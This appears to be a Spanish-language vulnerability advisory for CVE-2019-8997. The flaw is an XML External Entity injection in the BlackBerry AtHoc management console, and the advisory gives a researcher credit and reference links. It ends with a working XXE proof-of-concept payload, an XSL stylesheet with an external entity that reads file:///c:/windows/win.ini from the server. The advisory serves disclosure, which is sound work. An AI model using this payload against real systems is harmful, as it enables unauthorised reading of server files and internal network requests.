
Una vulnerabilidad de Inyección de Entidades Externas XML (XXE) en el Sistema de Gestión (consola) de BlackBerry AtHoc en versiones anteriores a 7.6 HF-567 podría permitir a un atacante leer potencialmente archivos locales arbitrarios desde el servidor de aplicaciones o realizar solicitudes en la red introduciendo XML manipulado maliciosamente en un campo existente.
Una vulnerabilidad de inyección de entidad externa XML (XXE) en el sistema de gestión (consola) de BlackBerry AtHoc en versiones anteriores a 7.6 HF-567 podría permitir a un atacante leer archivos locales arbitrarios del servidor de aplicaciones o realizar solicitudes en la red mediante la introducción de XML manipulado maliciosamente en un campo existente.
Nolan B. Kennedy (nxkennedy)
http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997
https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/
<!DOCTYPE doc [
<!ELEMENT doc ANY >
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">
<doc>&foo;</doc>
<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>